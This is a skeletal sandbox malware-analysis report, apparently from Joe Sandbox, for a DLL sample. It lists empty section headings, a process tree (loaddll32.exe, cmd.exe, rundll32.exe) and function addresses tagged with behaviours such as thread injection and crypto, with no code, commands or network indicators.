HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 5584 Parent PID: 5688

General

Chronological Activities

Analysis Process: cmd.exe PID: 1936 Parent PID: 5584

General

Chronological Activities

Analysis Process: rundll32.exe PID: 4992 Parent PID: 5584

Function 1000163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 10001AFA, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 100012DC, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 100018F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 1000111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 1000135A, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Function 10001FE7, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 10001DFC, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Function 10001850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Function 10001745, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 10002375, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 10002154, Relevance: .1, Instructions: 77
COMMONCrypto

Function 1000102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 10001A0F, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 023D5F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 023D709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON

Function 023D2A69, Relevance: .2, Instructions: 161
COMMONCrypto

Function 03045F16, Relevance: 2.8, APIs: 1, Instructions: 1269
memoryCOMMONCrypto

Function 0304709D, Relevance: 3.1, APIs: 2, Instructions: 115
memoryCOMMON